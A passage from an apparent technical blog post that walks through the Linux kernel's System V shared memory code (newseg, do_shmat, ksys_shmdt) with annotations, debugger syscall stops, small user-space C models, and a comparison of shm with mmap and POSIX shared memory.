        /* this creates the dentry and inode for the new shmem file, links the two, and allocates a struct file to represent it */
	}
	error = PTR_ERR(file);
	if (IS_ERR(file))
		goto no_file;

	shp->shm_cprid = get_pid(task_tgid(current)); /* record the creator's pid */
	shp->shm_lprid = NULL;
	shp->shm_atim = shp->shm_dtim = 0;
	shp->shm_ctim = ktime_get_real_seconds();
	shp->shm_segsz = size;
	shp->shm_nattch = 0;
	shp->shm_file = file;
	shp->shm_creator = current;

	/* ipc_addid() locks shp upon success. */
	error = ipc_addid(&shm_ids(ns), &shp->shm_perm, ns->shm_ctlmni); /* hook the new shmid_kernel into the id tree inside shm_ids */
	if (error < 0)
		goto no_id;

	list_add(&shp->shm_clist, &current->sysvshm.shm_clist); /* add to the creator's list of shm segments */

	/*
	 * shmid gets reported as "inode#" in /proc/pid/maps.
	 * proc-ps tools use this. Changing this will break them.
	 */
	file_inode(file)->i_ino = shp->shm_perm.id;

	ns->shm_tot += numpages;
	error = shp->shm_perm.id;

	ipc_unlock_object(&shp->shm_perm);
	rcu_read_unlock();
	return error;

no_id:
	ipc_update_pid(&shp->shm_cprid, NULL);
	ipc_update_pid(&shp->shm_lprid, NULL);
	if (is_file_hugepages(file) && shp->mlock_user)
		user_shm_unlock(size, shp->mlock_user);
	fput(file);
	ipc_rcu_putref(&shp->shm_perm, shm_rcu_free); /* drop the reference so the object gets freed */
	return error;
no_file:
	call_rcu(&shp->shm_perm.rcu, shm_rcu_free);
	return error;
}
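
Two small calculations in newseg are easy to check against the earlier GDB session: the size is rounded up to whole pages, and the file name is built from the key. The sketch below reproduces both in user space. The helper names and the TOY_PAGE_* constants are hypothetical, and a 4 KiB page size is assumed.

```c
#include <stdio.h>
#include <stddef.h>

#define TOY_PAGE_SHIFT 12                      /* assumption: 4 KiB pages */
#define TOY_PAGE_SIZE  (1UL << TOY_PAGE_SHIFT)

/* Same rounding as: numpages = (size + PAGE_SIZE - 1) >> PAGE_SHIFT */
size_t shm_pages_for(size_t size)
{
    return (size + TOY_PAGE_SIZE - 1) >> TOY_PAGE_SHIFT;
}

/* Same format as: sprintf(name, "SYSV%08x", key)
 * 4 characters + 8 hex digits + terminator = 13 bytes. */
void shm_segment_name(unsigned int key, char name[13])
{
    snprintf(name, 13, "SYSV%08x", key);
}
```

With the values from the session above, shm_pages_for(0x2800) gives 3 pages, which agrees with the 0x3000-byte /SYSV7a05274f region in the vmmap listing, and shm_segment_name(0x7a05274f, name) yields that same name without the leading slash.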

Next, let's look at how shmem_kernel_file_setup creates the file (the new struct file exists solely to be memory-mapped):

struct file *shmem_kernel_file_setup(const char *name, loff_t size, unsigned long flags)
{
	return __shmem_file_setup(shm_mnt, name, size, flags, S_PRIVATE);
}

static struct file *__shmem_file_setup(struct vfsmount *mnt, const char *name, loff_t size,
				       unsigned long flags, unsigned int i_flags)
{
	struct inode *inode;
	struct file *res;

	if (IS_ERR(mnt))
		return ERR_CAST(mnt);

	if (size < 0 || size > MAX_LFS_FILESIZE)
		return ERR_PTR(-EINVAL);

	if (shmem_acct_size(flags, size))
		return ERR_PTR(-ENOMEM);

	inode = shmem_get_inode(mnt->mnt_sb, NULL, S_IFREG | S_IRWXUGO, 0,
				flags); /* allocate an inode and initialize it */
	if (unlikely(!inode)) {
		shmem_unacct_size(flags, size);
		return ERR_PTR(-ENOSPC);
	}
	inode->i_flags |= i_flags;
	inode->i_size = size;
	clear_nlink(inode);	/* It is unlinked */
	res = ERR_PTR(ramfs_nommu_expand_for_mapping(inode, size));
	if (!IS_ERR(res))
		res = alloc_file_pseudo(inode, mnt, name, O_RDWR,
				&shmem_file_operations); /* allocate a (pseudo) file on top of the inode */
	if (IS_ERR(res))
		iput(inode);
	return res;
}

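Besides creating a new file (not a real on-disk file but an abstract file that lives in memory, which is the fundamental difference between shm and a file-backed mmap), newseg also allocates an important structure in kernel memory.
That structure is shmid_kernel, which manages the shared memory segment created by shmget: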

struct shmid_kernel /* private to the kernel */
{
	struct kern_ipc_perm	shm_perm;
	struct file		*shm_file;
	unsigned long		shm_nattch;
	unsigned long		shm_segsz;
	time64_t		shm_atim;
	time64_t		shm_dtim;
	time64_t		shm_ctim;
	struct pid		*shm_cprid;
	struct pid		*shm_lprid;
	struct user_struct	*mlock_user;

	/* The task created the shm object.  NULL if the task is dead. */
	struct task_struct	*shm_creator;
	struct list_head	shm_clist;	/* list by creator */
} __randomize_layout;
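
Several of these fields are visible from user space: shmctl with IPC_STAT copies them into a struct shmid_ds, whose shm_nattch and shm_segsz members correspond to the kernel fields of the same name. A minimal sketch, with the hypothetical helper name shm_query:

```c
#include <stddef.h>
#include <sys/ipc.h>
#include <sys/shm.h>

/* Read the attach count and size of a segment via IPC_STAT.
 * Returns 0 on success, -1 if shmctl fails. */
int shm_query(int shmid, unsigned long *nattch, size_t *segsz)
{
    struct shmid_ds ds;

    if (shmctl(shmid, IPC_STAT, &ds) < 0)
        return -1;
    *nattch = (unsigned long)ds.shm_nattch;   /* mirrors shp->shm_nattch */
    *segsz = ds.shm_segsz;                    /* mirrors shp->shm_segsz */
    return 0;
}
```

This is the same information ipcs -m prints in its nattch and bytes columns, so calling shm_query before and after shmat or shmdt should show the count moving by one.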

Both shmat and shmdt rely on another important structure, shm_file_data:

struct shm_file_data {
	int id;
	struct ipc_namespace *ns;
	struct file *file;
	const struct vm_operations_struct *vm_ops;
};

shmat, the core function for mapping shared memory:

► 0x7ffff7ee1199 <shmat+9>        syscall  <SYS_shmat>
       shmid: 0x24
       shmaddr: 0x0
       shmflg: 0x0

Under the hood, shmat calls do_shmat:

long do_shmat(int shmid, char __user *shmaddr, int shmflg,
	      ulong *raddr, unsigned long shmlba)
{
	struct shmid_kernel *shp;
	unsigned long addr = (unsigned long)shmaddr;
	unsigned long size;
	struct file *file, *base;
	int    err;
	unsigned long flags = MAP_SHARED;
	unsigned long prot;
	int acc_mode;
	struct ipc_namespace *ns;
	struct shm_file_data *sfd;
	int f_flags;
	unsigned long populate = 0;

	err = -EINVAL;
	if (shmid < 0)
		goto out;

	if (addr) { /* shmaddr is non-NULL (uncommon) */
		if (addr & (shmlba - 1)) {
			if (shmflg & SHM_RND) {
				addr &= ~(shmlba - 1);  /* round down */

				/*
				 * Ensure that the round-down is non-nil
				 * when remapping. This can happen for
				 * cases when addr < shmlba.
				 */
				if (!addr && (shmflg & SHM_REMAP))
					goto out;
			} else
#ifndef __ARCH_FORCE_SHMLBA
				if (addr & ~PAGE_MASK)
#endif
					goto out;
		}

		flags |= MAP_FIXED;
	} else if ((shmflg & SHM_REMAP)) 
		goto out;

	if (shmflg & SHM_RDONLY) { /* SHM_RDONLY: attach read-only */
		prot = PROT_READ;
		acc_mode = S_IRUGO;
		f_flags = O_RDONLY;
	} else {
		prot = PROT_READ | PROT_WRITE;
		acc_mode = S_IRUGO | S_IWUGO;
		f_flags = O_RDWR;
	}
	if (shmflg & SHM_EXEC) { /* SHM_EXEC: request execute permission on the segment */
		prot |= PROT_EXEC;
		acc_mode |= S_IXUGO;
	}

	/*
	 * We cannot rely on the fs check since SYSV IPC does have an
	 * additional creator id...
	 */
	ns = current->nsproxy->ipc_ns;
	rcu_read_lock();
	shp = shm_obtain_object_check(ns, shmid); /* use the shmid to find the matching struct shmid_kernel in the id tree */
	if (IS_ERR(shp)) {
		err = PTR_ERR(shp);
		goto out_unlock;
	}

	err = -EACCES;
	if (ipcperms(ns, &shp->shm_perm, acc_mode))
		goto out_unlock;

	err = security_shm_shmat(&shp->shm_perm, shmaddr, shmflg);
	if (err)
		goto out_unlock;

	ipc_lock_object(&shp->shm_perm);

	/* check if shm_destroy() is tearing down shp */
	if (!ipc_valid_object(&shp->shm_perm)) {
		ipc_unlock_object(&shp->shm_perm);
		err = -EIDRM;
		goto out_unlock;
	}

	/*
	 * We need to take a reference to the real shm file to prevent the
	 * pointer from becoming stale in cases where the lifetime of the outer
	 * file extends beyond that of the shm segment.  It's not usually
	 * possible, but it can happen during remap_file_pages() emulation as
	 * that unmaps the memory, then does ->mmap() via file reference only.
	 * We'll deny the ->mmap() if the shm segment was since removed, but to
	 * detect shm ID reuse we need to compare the file pointers.
	 */
	base = get_file(shp->shm_file); /* take a reference to the in-memory shmem file, base */
	shp->shm_nattch++;
	size = i_size_read(file_inode(base)); /* read the size of shm_file */
	ipc_unlock_object(&shp->shm_perm);
	rcu_read_unlock();

	err = -ENOMEM;
	sfd = kzalloc(sizeof(*sfd), GFP_KERNEL); /* allocate the shm_file_data */
	if (!sfd) {
		fput(base);
		goto out_nattch;
	}

	file = alloc_file_clone(base, f_flags,
			  is_file_hugepages(base) ?
				&shm_file_operations_huge :
				&shm_file_operations); 
    /* clone a struct file that refers to the same path as base; its private_data is pointed at sfd a few lines below */
	err = PTR_ERR(file);
	if (IS_ERR(file)) {
		kfree(sfd);
		fput(base);
		goto out_nattch;
	}

	sfd->id = shp->shm_perm.id;
	sfd->ns = get_ipc_ns(ns);
	sfd->file = base;
	sfd->vm_ops = NULL;
	file->private_data = sfd;

	err = security_mmap_file(file, prot, flags);
	if (err)
		goto out_fput;

	if (down_write_killable(&current->mm->mmap_sem)) {
		err = -EINTR;
		goto out_fput;
	}

	if (addr && !(shmflg & SHM_REMAP)) {
		err = -EINVAL;
		if (addr + size < addr)
			goto invalid;

		if (find_vma_intersection(current->mm, addr, addr + size))
			goto invalid;
	}

	addr = do_mmap_pgoff(file, addr, size, prot, flags, 0, &populate, NULL); /* core mapping routine (mmap ends up here as well) */
	*raddr = addr;
	err = 0;
	if (IS_ERR_VALUE(addr))
		err = (long)addr;
invalid:
	up_write(&current->mm->mmap_sem);
	if (populate)
		mm_populate(addr, populate);

out_fput:
	fput(file);

out_nattch:
	down_write(&shm_ids(ns).rwsem);
	shp = shm_lock(ns, shmid);
	shp->shm_nattch--;
	if (shm_may_destroy(ns, shp))
		shm_destroy(ns, shp);
	else
		shm_unlock(shp);
	up_write(&shm_ids(ns).rwsem);
	return err;

out_unlock:
	rcu_read_unlock();
out:
	return err;
}

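The part of do_shmat that actually sets up the mapping is the same as for mmap; do_mmap_pgoff was already analyzed in an earlier post.
PS: since do_mmap_pgoff ends up calling do_mmap, the mapping can be released with do_munmap, which is exactly what shmdt relies on under the hood.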
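
The address handling at the top of do_shmat is compact enough to model in user space. The sketch below mirrors that branch for architectures that do not define __ARCH_FORCE_SHMLBA (an assumption, as is passing shmlba and the page size in as parameters). The function name and the TOY_ constants are hypothetical; the constants carry the same values as SHM_RND and SHM_REMAP on Linux.

```c
#include <errno.h>

#define TOY_SHM_RND   020000   /* same value as SHM_RND on Linux */
#define TOY_SHM_REMAP 040000   /* same value as SHM_REMAP on Linux */

/* Model of the shmaddr checks in do_shmat.
 * On success returns 0, stores the (possibly rounded) address in *out
 * and sets *fixed to 1 when the kernel would add MAP_FIXED.
 * On failure returns -EINVAL and leaves the outputs untouched. */
int toy_check_shmaddr(unsigned long addr, int shmflg,
                      unsigned long shmlba, unsigned long page_size,
                      unsigned long *out, int *fixed)
{
    int want_fixed = 0;

    if (addr) {
        if (addr & (shmlba - 1)) {              /* not SHMLBA-aligned */
            if (shmflg & TOY_SHM_RND) {
                addr &= ~(shmlba - 1);          /* round down */
                if (!addr && (shmflg & TOY_SHM_REMAP))
                    return -EINVAL;             /* would remap page 0 */
            } else if (addr & (page_size - 1)) {
                return -EINVAL;                 /* not even page-aligned */
            }
        }
        want_fixed = 1;                         /* caller chose the spot */
    } else if (shmflg & TOY_SHM_REMAP) {
        return -EINVAL;                         /* REMAP needs an address */
    }

    *out = addr;
    *fixed = want_fixed;
    return 0;
}
```

For example, an address of 0x70001234 with TOY_SHM_RND and a 4 KiB shmlba comes back as 0x70001000 with fixed set, while the same address without TOY_SHM_RND is rejected.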

shmdt, the core function for detaching shared memory:

 ► 0x7ffff7ee11c9 <shmdt+9>        syscall  <SYS_shmdt>
       shmaddr: 0x7ffff7ffb000 ◂— 0x0

Under the hood, shmdt calls ksys_shmdt:

long ksys_shmdt(char __user *shmaddr)
{
	struct mm_struct *mm = current->mm;
	struct vm_area_struct *vma;
	unsigned long addr = (unsigned long)shmaddr;
	int retval = -EINVAL;
#ifdef CONFIG_MMU
	loff_t size = 0;
	struct file *file;
	struct vm_area_struct *next;
#endif

	if (addr & ~PAGE_MASK)
		return retval;

	if (down_write_killable(&mm->mmap_sem))
		return -EINTR;

	/*
	 * This function tries to be smart and unmap shm segments that
	 * were modified by partial mlock or munmap calls:
	 * - It first determines the size of the shm segment that should be
	 *   unmapped: It searches for a vma that is backed by shm and that
	 *   started at address shmaddr. It records it's size and then unmaps
	 *   it.
	 * - Then it unmaps all shm vmas that started at shmaddr and that
	 *   are within the initially determined size and that are from the
	 *   same shm segment from which we determined the size.
	 * Errors from do_munmap are ignored: the function only fails if
	 * it's called with invalid parameters or if it's called to unmap
	 * a part of a vma. Both calls in this function are for full vmas,
	 * the parameters are directly copied from the vma itself and always
	 * valid - therefore do_munmap cannot fail. (famous last words?)
	 */
	/*
	 * If it had been mremap()'d, the starting address would not
	 * match the usual checks anyway. So assume all vma's are
	 * above the starting address given.
	 */
	vma = find_vma(mm, addr); /* return the first VMA of this process whose end lies above addr (it contains addr or is the next one after it) */

#ifdef CONFIG_MMU
	while (vma) {
		next = vma->vm_next;

		/*
		 * Check if the starting address would match, i.e. it's
		 * a fragment created by mprotect() and/or munmap(), or it
		 * otherwise it starts at this address with no hassles.
		 */
		if ((vma->vm_ops == &shm_vm_ops) &&
			(vma->vm_start - addr)/PAGE_SIZE == vma->vm_pgoff) {

			/*
			 * Record the file of the shm segment being
			 * unmapped.  With mremap(), someone could place
			 * page from another segment but with equal offsets
			 * in the range we are unmapping.
			 */
			file = vma->vm_file;
			size = i_size_read(file_inode(vma->vm_file));
			do_munmap(mm, vma->vm_start, vma->vm_end - vma->vm_start, NULL); /* release the mapping created by do_mmap */
			/*
			 * We discovered the size of the shm segment, so
			 * break out of here and fall through to the next
			 * loop that uses the size information to stop
			 * searching for matching vma's.
			 */
			retval = 0;
			vma = next;
			break;
		}
		vma = next;
	}

	/*
	 * We need look no further than the maximum address a fragment
	 * could possibly have landed at. Also cast things to loff_t to
	 * prevent overflows and make comparisons vs. equal-width types.
	 */
	size = PAGE_ALIGN(size);
	while (vma && (loff_t)(vma->vm_end - addr) <= size) {
		next = vma->vm_next;

		/* finding a matching vma now does not alter retval */
		if ((vma->vm_ops == &shm_vm_ops) &&
		    ((vma->vm_start - addr)/PAGE_SIZE == vma->vm_pgoff) &&
		    (vma->vm_file == file))
			do_munmap(mm, vma->vm_start, vma->vm_end - vma->vm_start, NULL); /* release the mapping created by do_mmap */
		vma = next;
	}

#else	/* CONFIG_MMU */
	/* under NOMMU conditions, the exact address to be destroyed must be
	 * given
	 */
	if (vma && vma->vm_start == addr && vma->vm_ops == &shm_vm_ops) {
		do_munmap(mm, vma->vm_start, vma->vm_end - vma->vm_start, NULL); /* release the mapping created by do_mmap */
		retval = 0;
	}

#endif

	up_write(&mm->mmap_sem);
	return retval;
}

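The kernel developers have already documented the unmapping walk in the comments; each of these steps is there for either safety or efficiency.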
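
The matching rule in that walk, (vm_start - addr) / PAGE_SIZE == vm_pgoff, is what lets shmdt find the leftover fragments after a partial munmap or mprotect has split the original mapping. The toy model below replays the two loops over a sorted array instead of real VMAs. All names are hypothetical, 4 KiB pages are assumed, the array is assumed to start at the first entry ending above addr (what find_vma would return), and the segment size is passed in rather than read from the inode.

```c
#include <stddef.h>

#define TOY_PAGE_SIZE 4096UL    /* assumption: 4 KiB pages */

struct toy_vma {
    unsigned long start;    /* vm_start */
    unsigned long end;      /* vm_end */
    unsigned long pgoff;    /* vm_pgoff: offset into the file, in pages */
    int is_shm;             /* stands in for vm_ops == &shm_vm_ops */
    int file_id;            /* stands in for vm_file */
};

/* Does this VMA look like a piece of a segment attached at addr?
 * The start >= addr test is an explicit guard added for the model. */
int toy_is_fragment_of(const struct toy_vma *vma, unsigned long addr)
{
    return vma->is_shm && vma->start >= addr &&
           (vma->start - addr) / TOY_PAGE_SIZE == vma->pgoff;
}

/* Count the VMAs the two loops of ksys_shmdt would unmap.
 * seg_size is the page-aligned size of the segment. */
int toy_shmdt_count(const struct toy_vma *v, size_t n,
                    unsigned long addr, unsigned long seg_size)
{
    size_t i = 0;
    int unmapped = 0;
    int file = -1;

    /* first loop: find the first fragment and remember its file */
    for (; i < n; i++) {
        if (toy_is_fragment_of(&v[i], addr)) {
            file = v[i].file_id;
            unmapped++;
            i++;
            break;
        }
    }
    /* second loop: only look as far as the segment can reach */
    for (; i < n && v[i].end - addr <= seg_size; i++)
        if (toy_is_fragment_of(&v[i], addr) && v[i].file_id == file)
            unmapped++;
    return unmapped;
}
```

With a three-page segment whose middle page was replaced by another mapping, the model counts the first and third page as fragments and stops before a neighbouring segment that starts right after it.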

mmap VS shm

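How mmap works (for a file-backed mapping):
- A file is created on disk and every process maps it into its own address space; even with many processes, the cost in physical memory stays modest
- The data ultimately lives on disk; pages are only brought into memory when accessed and can be written back and evicted (light on memory, but slow whenever the disk has to be touched)
How shm works:
- Each process maps the shared segment directly onto pages in memory
- The data lives in memory and everything stored counts against main memory (fast, but memory-hungry)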

What intrigued me is that both shm and mmap ultimately rely on a file (a shared anonymous mmap is also backed internally by a /dev/zero-style shmem file)

mmap uses the file to store the data itself
shm uses the file as the vehicle for the mapping

Anonymous pipes likewise use alloc_file_pseudo to create an "abstract file" and move their data through it

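This actually makes sense: the inode managed by the file is tied directly to the memory, and file->f_op supplies many kernel functions specific to the underlying driver (for example, the do_mmap_pgoff call chain uses file->f_op->get_unmapped_area)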
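
For comparison with the System V calls, here is a sketch of the same parent/child exchange over a shared anonymous mmap. There is no key, no id and nothing to remove afterwards, but only processes that inherit the mapping across fork can see it. The function name mmap_roundtrip and the constant MAP_LEN are hypothetical.

```c
#define _DEFAULT_SOURCE     /* for MAP_ANONYMOUS under strict -std modes */
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>

#define MAP_LEN 4096        /* hypothetical mapping size */

/* Send msg from a child to the parent through a shared anonymous mapping.
 * Returns 0 and fills out on success, -1 on any failure. */
int mmap_roundtrip(const char *msg, char *out, size_t outlen)
{
    int status;
    pid_t pid;
    char *addr = mmap(NULL, MAP_LEN, PROT_READ | PROT_WRITE,
                      MAP_SHARED | MAP_ANONYMOUS, -1, 0);

    if (addr == MAP_FAILED)
        return -1;

    pid = fork();                       /* the mapping is inherited */
    if (pid < 0) {
        munmap(addr, MAP_LEN);
        return -1;
    }
    if (pid == 0) {                     /* child: write and leave */
        snprintf(addr, MAP_LEN, "%s", msg);
        _exit(0);
    }

    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status) ||
        WEXITSTATUS(status) != 0) {
        munmap(addr, MAP_LEN);
        return -1;
    }
    snprintf(out, outlen, "%s", addr);  /* parent sees the child's write */
    munmap(addr, MAP_LEN);
    return 0;
}
```

The trade-off is visible in the signatures: System V shm needs shmget, shmat, shmdt and shmctl but can be reached by any process that knows the key, whereas this variant is a single mmap call restricted to related processes.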

POSIX shared memory

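Traditional System V shm has an upgraded API, POSIX shared memory, whose user-space entry point is also called shm_open and creates a file under /dev/shm/ to serve as the shared memory. The System V code in the kernel happens to contain static helpers with similar names; they are internal callbacks and cleanup routines, not the POSIX API:

static void shm_open(struct vm_area_struct *vma); /* VMA open callback: a new mapping of the segment appeared (for example after fork), so shm_nattch is incremented */
static void shm_close(struct vm_area_struct *vma); /* VMA close callback: a mapping went away, so shm_nattch is decremented and the segment is destroyed if it may be */
static void shm_destroy(struct ipc_namespace *ns, struct shmid_kernel *shp); /* tear down the shmid_kernel and release its backing file */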